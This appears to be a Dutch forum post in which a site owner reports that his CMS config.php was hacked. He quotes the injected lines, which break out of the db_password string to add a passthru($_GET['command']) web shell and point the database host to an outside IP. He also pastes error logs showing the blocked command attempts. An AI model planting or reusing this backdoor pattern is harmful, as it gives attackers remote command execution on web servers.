Site config.php gehacked [solved]
Posted: Wed Dec 24, 2014 5:49 am
Wil vanochtend naar mijn site, geen respons. Na enig zoeken kom ik erachter dat op 14 dec. jl. mijn config.php is gewijzigd (rechten staan op 600). Niet begrijpend open ik de file en zie:
In de errorlog zie ik:
Onduidelijk hoe dit heeft kunnen gebeuren.
Code: Select all
$config['db_hostname'] = '85.10.205.173';
$config['db_username'] = # 'trollface';
$config['db_password'] = # ''.passthru($_GET['command']);exit;//';
$config['db_name'] = # 'trollface';Dat de passthru wordt tegengehouden is een geluk bij een ongeluk.[14-Dec-2014 19:35:37 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGTextarea() should be compatible with CMSModule::WYSIWYGTextarea($name = 'textarea', $columns = '80', $rows = '15', $encoding = '', $content = '', $stylesheet = '', $addtext = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:35:45 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGGenerateHeader() should be compatible with CMSModule::WYSIWYGGenerateHeader($htmlresult = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:35:45 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGTextarea() should be compatible with CMSModule::WYSIWYGTextarea($name = 'textarea', $columns = '80', $rows = '15', $encoding = '', $content = '', $stylesheet = '', $addtext = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:38:07 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGGenerateHeader() should be compatible with CMSModule::WYSIWYGGenerateHeader($htmlresult = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:38:07 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGTextarea() should be compatible with CMSModule::WYSIWYGTextarea($name = 'textarea', $columns = '80', $rows = '15', $encoding = '', $content = '', $stylesheet = '', $addtext = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:39:18 UTC] PHP Warning: passthru() has been disabled for security reasons in /home/efacti/public_html/uisge-beatha.eu/config.php on line 12
[14-Dec-2014 19:39:21 UTC] PHP Warning: passthru() has been disabled for security reasons in /home/efacti/public_html/uisge-beatha.eu/config.php on line 12
[14-Dec-2014 19:39:25 UTC] PHP Warning: passthru() has been disabled for security reasons in /home/efacti/public_html/uisge-beatha.eu/config.php on line 12
[14-Dec-2014 19:39:33 UTC] PHP Warning: passthru() has been disabled for security reasons in /home/efacti/public_html/uisge-beatha.eu/config.php on line 12
[1
Onduidelijk hoe dit heeft kunnen gebeuren.